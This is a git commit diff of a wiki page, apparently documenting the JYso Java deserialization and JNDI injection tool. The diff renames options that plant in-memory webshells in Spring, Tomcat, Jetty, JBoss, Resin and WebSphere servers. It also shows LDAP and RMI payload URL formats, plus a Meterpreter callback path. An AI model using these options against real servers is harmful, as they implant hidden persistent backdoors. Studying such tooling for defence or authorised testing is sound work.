Updated JYso‐CN (markdown)

炁
2024-03-14 12:14:58 +08:00
parent cc61e86b16
commit 590caee595
+20 -20
@@ -191,33 +191,33 @@ ldap://127.0.0.1:1389/[Basic or TomcatBypass]/E-Meterpreter/msf/[msf_ip]/[msf_po
内存马: 内存马:
- 命令 `EX-MS-SpringInterceptorMS-...`:向系统内植入 Spring 拦截器类型的内存马 - 命令 `MS-SpringInterceptorMS-...`:向系统内植入 Spring 拦截器类型的内存马
- 命令 `EX-MS-SpringControllerMS-...`:向系统内植入 Spring Controller 类型的内存马 - 命令 `MS-SpringControllerMS-...`:向系统内植入 Spring Controller 类型的内存马
- 命令 `EX-MS-SpringWebfluxMS-...`:向系统内植入 Spring WebFilter 类型的内存马(仅支持 gz 及 cmd) - 命令 `MS-SpringWebfluxMS-...`:向系统内植入 Spring WebFilter 类型的内存马(仅支持 gz 及 cmd)
- 命令 `EX-MS-TSMSFromJMXF`:利用 JMX MBeans 向系统内植入 Tomcat Filter 型内存马 - 命令 `MS-TSMSFromJMXF`:利用 JMX MBeans 向系统内植入 Tomcat Filter 型内存马
- 命令 `EX-MS-TSMSFromJMXS-...`:利用 JMX MBeans 向系统内植入 Tomcat Servlet 型内存马 - 命令 `MS-TSMSFromJMXS-...`:利用 JMX MBeans 向系统内植入 Tomcat Servlet 型内存马
- 命令 `EX-MS-TLMSFromJMXLi-...`:利用 JMX MBeans 向系统内植入 Tomcat Listener 型内存马 - 命令 `MS-TLMSFromJMXLi-...`:利用 JMX MBeans 向系统内植入 Tomcat Listener 型内存马
- 命令 `EX-MS-JFMSFromJMXF-...`:利用 JMX MBeans 向系统内植入 Jetty Filter 型内存马 - 命令 `MS-JFMSFromJMXF-...`:利用 JMX MBeans 向系统内植入 Jetty Filter 型内存马
- 命令 `EX-MS-JFMSFromJMXS-...`:利用 JMX MBeans 向系统内植入 Jetty Servlet 型内存马 - 命令 `MS-JFMSFromJMXS-...`:利用 JMX MBeans 向系统内植入 Jetty Servlet 型内存马
- 命令 `EX-MS-TFMSFromRequestF-...`:通过在线程组中找 Request 向系统内植入 Tomcat Filter 型内存马 - 命令 `MS-TFMSFromRequestF-...`:通过在线程组中找 Request 向系统内植入 Tomcat Filter 型内存马
- 命令 `EX-MS-TFMSFromRequestS-...`:通过在线程组中找 Request 向系统内植入 Tomcat Servlet 型内存马 - 命令 `MS-TFMSFromRequestS-...`:通过在线程组中找 Request 向系统内植入 Tomcat Servlet 型内存马
- 命令 `EX-MS-TFMSFromThreadF-...`:通过线程类加载器获取指定上下文向系统内植入 Tomcat Filter 型内存马 - 命令 `MS-TFMSFromThreadF-...`:通过线程类加载器获取指定上下文向系统内植入 Tomcat Filter 型内存马
- 命令 `EX-MS-TFMSFromThreadLi-...`:通过线程类加载器获取指定上下文向系统内植入 Tomcat Listener 型内存马 - 命令 `MS-TFMSFromThreadLi-...`:通过线程类加载器获取指定上下文向系统内植入 Tomcat Listener 型内存马
- 命令 `EX-MS-TFMSFromThreadS-...`:通过线程类加载器获取指定上下文向系统内植入 Tomcat Servlet 型内存马 - 命令 `MS-TFMSFromThreadS-...`:通过线程类加载器获取指定上下文向系统内植入 Tomcat Servlet 型内存马
- 命令 `EX-MS-JBFMSFromContextF-...`:通过全局上下文向系统内植入 JBoss/Wildfly Filter 型内存马 - 命令 `MS-JBFMSFromContextF-...`:通过全局上下文向系统内植入 JBoss/Wildfly Filter 型内存马
- 命令 `EX-MS-JBFMSFromContextS-...`:通过全局上下文向系统内植入 JBoss/Wildfly Servlet 型内存马 - 命令 `MS-JBFMSFromContextS-...`:通过全局上下文向系统内植入 JBoss/Wildfly Servlet 型内存马
- 命令 `EX-MS-RFMSFromThreadF-...`:通过线程类加载器获取指定上下文系统内植入 Resin Filter 型内存马 - 命令 `MS-RFMSFromThreadF-...`:通过线程类加载器获取指定上下文系统内植入 Resin Filter 型内存马
- 命令 `EX-MS-RFMSFromThreadS-...`:通过线程类加载器获取指定上下文系统内植入 Resin Servlet 型内存马 - 命令 `MS-RFMSFromThreadS-...`:通过线程类加载器获取指定上下文系统内植入 Resin Servlet 型内存马
- 命令 `EX-MS-WSFMSFromThread-...`:通过线程类加载器获取指定上下文系统内植入 Websphere Filter 型内存马 - 命令 `MS-WSFMSFromThread-...`:通过线程类加载器获取指定上下文系统内植入 Websphere Filter 型内存马
+ JNDI-Injection-Exploit 用法: + JNDI-Injection-Exploit 用法:
+ shell后可以加额外参数,需要base64编码,参数具体看1.5 + shell后可以加额外参数,需要base64编码,参数具体看1.5
``` ```
ldap://127.0.0.1:1389/[Basic or TomcatBypass]/[M-EX-MS-MemShellClass-...]/shell/base64params ldap://127.0.0.1:1389/[Basic or TomcatBypass]/[M-MS-MemShellClass-...]/shell/base64params
``` ```
``` ```
rmi://127.0.0.1:1099/M-EX-MS-RFMSFromThreadF-..#params rmi://127.0.0.1:1099/M-MS-RFMSFromThreadF-..#params
``` ```
+ ysoserial + ysoserial